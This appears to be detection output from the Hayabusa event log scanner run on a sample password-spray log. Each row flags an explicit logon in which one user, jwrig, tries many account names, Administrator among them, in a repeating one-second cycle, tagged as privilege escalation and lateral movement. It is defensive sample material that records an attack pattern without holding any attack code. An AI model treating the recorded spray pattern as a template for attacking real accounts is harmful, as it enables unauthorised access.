2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
